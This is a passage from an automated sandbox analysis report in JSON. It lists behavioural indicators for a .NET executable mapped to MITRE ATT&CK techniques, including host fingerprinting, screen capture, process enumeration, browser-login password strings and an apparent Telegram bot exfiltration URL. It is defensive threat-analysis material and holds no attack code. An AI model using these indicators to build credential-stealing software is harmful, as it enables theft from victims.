\"sendmessage\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to API \"System.ServiceModel.Activities.Configuration.SendMessageChannelCacheElement, System.ServiceModel.Activities, Version=<IPv4>, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" (Indicator: \"sendmessage\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"P~AeS\" (Indicator: \"aes\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"FromBase64String\" (Indicator: \"base64\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"FromBase64String\" (Indicator: \"FromBase64String\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"icrosoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")\n Found string \"Microsoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"description=\"Uses RsaCryptoServiceProvider to encrypt and decrypt\"\" (Indicator: \"RsaCryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"P~AeS\" (Indicator: \"aes\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"FromBase64String\" (Indicator: \"base64\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"Switch.System.Security.Cryptography.DoNotAddrOfCspParentWindowHandle\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"Switch.System.Security.Cryptography.UseLegacyFipsThrow\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.RandomNumberGenerator\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"Uses RsaCryptoServiceProvider to encrypt and decrypt\" (Indicator: \"RsaCryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA1\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"aes\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"aescryptoserviceprovider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.RSACng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.DSACng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesManaged, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"aes\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.AesManaged, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.ECDiffieHellmanCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.ECDsaCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ecdsa\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.ECDsaCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.MD5Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA1Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA256Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA256CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA384Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA384CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.SHA512Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-569", "type": 2, "relevance": 1, "name": "Contains ability to retrieve type of COM object", "description": "Found string \"GetTypeFromCLSID\" (Indicator: \"GetTypeFromCLSID\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"GetTypeFromCLSID\" (Indicator: \"GetTypeFromCLSID\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1559.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"date_password_modified\" (Indicator: \"password\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"passwordField\" (Indicator: \"password\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"password_type\" (Indicator: \"password\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"password_value\" (Indicator: \"password\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"password_element\" (Indicator: \"password\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n file/memory contains long string with (Indicator: \"password\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"ion_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified FROM logins\" (Indicator: \"password\"; File: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"passwordFormat=\"Hashed\"\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"passwordAttemptWindow=\"10\"\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"passwordStrengthRegularExpression=\"\" />\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n file/memory contains long string with (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"date_password_modified\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"passwordField\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"password_type\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"password_value\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"password_element\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found string \"passwordFormat\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"passwordAttemptWindow\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"passwordStrengthRegularExpression\" (Indicator: \"password\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"microsoft.net/framework/v4.0.30319/\"\n Heuristic match: \"zation.formatters.so\"\n Pattern match: \"http://t.me/cinoshibot\"\n Pattern match: \"http://go.microsoft.com/fwlink/?linkid=42127\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#dsa-sha1\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha512\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#sha512\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#ripemd160\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#des-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#tripledes-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-tripledes\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes128-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes128\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes192-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes192\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes256-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes256\"\n Pattern match: \"http://www.w3.org/tr/2001/rec-xml-c14n-20010315\"\n Pattern match: \"http://www.w3.org/tr/2001/rec-xml-c14n-20010315#withcomments\"\n Pattern match: \"http://www.w3.org/2001/10/xml-exc-c14n#\"\n Pattern match: \"http://www.w3.org/2001/10/xml-exc-c14n#withcomments\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#base64\"\n Pattern match: \"http://www.w3.org/tr/1999/rec-xpath-19991116\"\n Pattern match: \"http://www.w3.org/tr/1999/rec-xslt-19991116\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"\n Pattern match: \"http://www.w3.org/2002/07/decrypt#xml\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#hmac-sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#md5\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-md5\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-ripemd160\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha512\"\n Pattern match: \"http://www.w3.org/2000/xmlns/\"\n Pattern match: \"http://www.w3.org/xml/1998/namespace\"\n Pattern match: \"http://schemas.microsoft.com/.netconfiguration/v2.0\"\n Pattern match: \"system.web/anonymousidentification\"\n Pattern match: \"system.web/authentication\"\n Pattern match: \"system.web/authorization\"\n Pattern match: \"system.web/browsercaps\"\n Pattern match: \"system.web/clienttarget\"\n Pattern match: \"system.web/compilation\"\n Pattern match: \"system.web/customerrors\"\n Pattern match: \"system.web/deployment\"\n Pattern match: \"system.web/devicefilters\"\n Pattern match: \"system.web/fulltrustassemblies\"\n Pattern match: \"system.web/globalization\"\n Pattern match: \"system.web/healthmonitoring\"\n Pattern match: \"system.web/hostingenvironment\"\n Pattern match: \"system.web/httpcookies\"\n Pattern match: \"system.web/httphandlers\"\n Pattern match: \"system.web/httpmodules\"\n Pattern match: \"system.web/httpruntime\"\n Pattern match: \"system.web/identity\"\n Pattern match: \"system.web/machinekey\"\n Pattern match: \"system.web/membership\"\n Pattern match: \"system.web/mobilecontrols\"\n 